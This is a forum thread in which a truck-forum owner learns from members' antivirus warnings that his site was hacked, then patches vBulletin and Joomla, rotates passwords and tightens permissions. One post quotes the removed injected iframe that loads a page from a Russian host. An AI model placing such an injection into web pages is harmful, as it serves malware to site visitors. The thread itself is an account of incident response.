Jump to content
  • Welcome To Mopar1973Man.Com

    We can see that your guest and been lurking about. When you register on the Mopar1973Man.Com site you'll be able to interact with all the other members. This is the most friendliest Cummins forum you'll ever join. Take the time right now and  REGISTER  on the Mopar1973Man.Com this will open up many more options and functions on the website. Everyone is very friendly and helpful just ask questions and everyone will help you out the best they can. 

Sign in to follow this  
hex0rz

www.mopar1973man.com - HACKED

Recommended Posts

Alright, so I'm starting to get warnings, alerts, blocks to the site. I have had windows defender and AVG warn me that the site is unsafe and it could potentially reveal personal or financial information. AVG gave me a 1889 number.Mike, might be time to look into this...

Share this post


Link to post
Share on other sites

I run AVG on both my computers & never had a warning on this site. I removed Defender. I'm using IE on Windows 7 machines now.

Share this post


Link to post
Share on other sites

Google report no malware.There is only 2 pieces of software here. vBulletin 4.2.0 and Joomla 2.5.3 which haven't changed in over 6-9 months. I'm waiting for the vBulletin 4.2.1 update before doing the up Joomla 2.5.6 update.Maybe you need to Linux there no such thing as malware over here. :lol:

Share this post


Link to post
Share on other sites

Could someone post this error and what its saying. So I can investigate it more since 2 people now see it. I personally think is a fluke and poor definitions on AVG part.If its particular URL's or pages please list them too.Here is my check.

post-2-138698193881_thumb.jpg

Share this post


Link to post
Share on other sites

Mike,

Can you receive text with pics on the listed number? I have a picture of it to send to you.

- - - Updated - - -

Nevermind, I will get it on here.

- - - Updated - - -

Here you go. I am a member on a local site that had the same issue awhile back, I am friends with the owner of it and I will try to make contact with him to see if there was a fix or a problem for that matter.

Posted Image

Share this post


Link to post
Share on other sites

Site has been hacked... :banghead: But I got the code out of it.

<iframe src="http://lemonadiom.ru:8080/forum/links/news.php"></iframe>
If you run across more let me know. I'm going to call my hosting provider. UPDATE: Nothing basically they can do they assume its a weakness in my site somewhere and need to update everything. Yes my Joomla is a few sub versions behind and the vBulletin is due for 4.2.1 as soon as its released. So hang in tight gang.. Please give me any information if you find more...

Share this post


Link to post
Share on other sites

Site has been hacked... :banghead: But I got the code out of it.

<iframe src="http://lemonadiom.ru:8080/forum/links/news.php"></iframe>
If you run across more let me know. I'm going to call my hosting provider. UPDATE: Nothing basically they can do they assume its a weakness in my site somewhere and need to update everything. Yes my Joomla is a few sub versions behind and the vBulletin is due for 4.2.1 as soon as its released. So hang in tight gang.. Please give me any information if you find more...
SEE! I'm not crazy! :tease:

Share this post


Link to post
Share on other sites

SEE! I'm not crazy! :tease:

Ok... So I'm busted... UPDATE: Installing vB 4.2.0 Patch level 3. I think they gain entry through the Joomla and managed to hack the index.htm. But Also the article database is ringing red flags too so I assume that where the hacker managed to get in. So I'll get the update hammer into that next. I'm going to work hard and long tonight to harden the site up again. (#%&) Hackers... Grrr...

Share this post


Link to post
Share on other sites

UPDATE: Both vBulletin (4.2.0 PL3) and Joomla (2.5.7) are up to date as of now. articles.mopar1973man.com Joomla still reports two issues with crashing PHP files but no malware detected. http://sitecheck.sucuri.net/results/articles.mopar1973man.com forum.mopar1973man.com - Reports clean - http://sitecheck.sucuri.net/results/forum.mopar1973man.com www.mopar1973man.com - Reports Clean - http://sitecheck.sucuri.net/results/www.mopar1973man.com srrfd.mopar1973man.com - Reports Clean - http://sitecheck.sucuri.net/results/srrfd.mopar1973man.com Let me know gang... Thank you guys for reporting this. I just never thought I would be a target for hackers but I guess its time to thank my lucky stars it was mild and nothing out outrageous occurred. So I'll be putting everything else on the back burner for now and putting priority on site security and going to harden the server even more. Dang Hackers... Where is my virtual 9mm's??? :gun::mad:

Share this post


Link to post
Share on other sites

I wonder why I didn't get a warning? I have the url in my favorites & just click on. Running scans now.

Share this post


Link to post
Share on other sites

Russ its just like my Google Webmaster scan were clean too. But once 2 people come forward claiming the same thing and showing me the same problem with 2 different softwares now I've got a problem and have to act. Someone manage to inject that small piece code that suppose to carry a payload of malware. Once again since I'm already on Ubuntu Linux and so is the site neither one can directly see the payload nor can be effected by the payload. But you Windows user would be affect by it. So like what occurred I acted when 2 came forward claiming the same issues.

Share this post


Link to post
Share on other sites

Well I've been over this server with a fine toothed comb and I'm pretty sure I closed up any holes so far. Changed a few file security permissions to hopefully thwart any would-be hacker from trying that same stunt twice.Also going to perfect my backup system a bit more to get copies of the site on a regular basis.

Share this post


Link to post
Share on other sites

Ok gang. There will be some serious changes made to the site. Mostly things you guys can't see but I can. Like I'm going to be changing all the passwords to the MySQL databases, hosting passwords, FTP passwords, etc. I'm going to go for super strength stuff here. (64 character or better!) Yes it going to long ones. The kind of stuff you create a text file and cut and paste them back and forth.As for the forum I'll bee changing a few folders around to prevent hackers from figuring out where the control panels are for the staff and myself.Then I'll be double checking all the file permissions to be sure there wasn't a folder or file left open to the public to read/write to by accident.

  • Like 1

Share this post


Link to post
Share on other sites

Ok Gang... (Whew!) I managed to change all the passwords on the site. Every MySQL database has a different password now. Even the FTP login for myself has been changed. Been through most all the files and got most of them changed to tighter security policies of read only for most. Double check all the configuration files to be sure they are not public readable. (404 page error). If there is any problems that pop up because of changes please let me know. I might of over tighten the leash... :rolleyes:

keep that file on a thumbdrive only, thats secure! :) thanks again mr IT man!!!

How about burning it to a DVD-RW and calling it good.. :wink:

Share this post


Link to post
Share on other sites

Another safety net I forgot about. (Whew!) Thankful I built the script a while back and ran it off and on. But I've got full backups of both articles.mopar1973man.com and forum.mopar1973man.com and their databases too. They are buried in a non-public folder of the server which had all the little tidbits mods I made to the site. But here is the script I was talking about. http://forum.mopar1973man.com/threads/6014-Lightning-Fast-Linux-Web-Server-Backups! I'm tankful of making notes here on the forum because it reminds me of things I did a while back for a particular reason. :whistle:

  • Like 2

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  



×
×
  • Create New...